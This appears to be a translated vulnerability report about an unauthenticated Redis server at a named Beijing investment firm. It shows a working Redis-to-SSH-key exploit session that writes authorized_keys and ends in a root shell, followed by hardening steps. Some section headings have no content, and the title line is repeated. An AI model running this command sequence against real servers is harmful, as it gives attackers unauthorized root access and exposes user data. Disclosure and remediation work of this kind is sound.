Unauthorized access to the Redis server of a financial investment company can cause a large amount of user information leakage.

Unauthorized access to the Redis server of a financial investment company can cause a large amount of user information leakage.

Unauthorized access to the Redis server of a financial investment company can cause a large amount of user information leakage.

0x00 unauthorized access to Redis server of Beijing qianjing fortune Investment Management

Code Region

http://**.**.**.**

Problematic IP Address

Code Region

**.**.**.**:6379

Payload

Code Region

root@kali:~/.ssh# cat foo.txt | redis-cli -h **.**.**.** -x set crackitOKroot@kali:~/.ssh# redis-cli -h **.**.**.****.**.**.**:6379> config set dir /root/.ssh/OK**.**.**.**:6379> config get dir1) "dir"2) "/root/.ssh"**.**.**.**:6379> config set dbfilename "authorized_keys"OK**.**.**.**:6379> saveOK**.**.**.**:6379> quitroot@kali:~/.ssh# ssh -i id_rsa root@**.**.**.**[root@web3 ~]#

0x02 Intranet

0x03 database backup files

Solution:

1. Specify the NIC used by the redis Service (redis needs to be restarted to take effect)

In the redis. conf file, find "# bind **. **", remove the # sign, and save it. Note: After modification, only the local machine can access Redis.

2. Set the access password (redis needs to be restarted to take effect)

Find the "requirepass" field in redis. conf and fill in the password you need later. The Redis client also needs this password to access the Redis service.

3. Modify the account for running the Redis Service

Run the Redis service with a lower-permission account and disable the account's logon permission. Attackers can write files to the disk, but Redis data can still be accessed or maliciously deleted by hackers.

4. Set firewall policies

If the Redis service needs to be accessed by other servers in normal business, you can set the iptables policy to allow only the specified IP address to access the Redis service.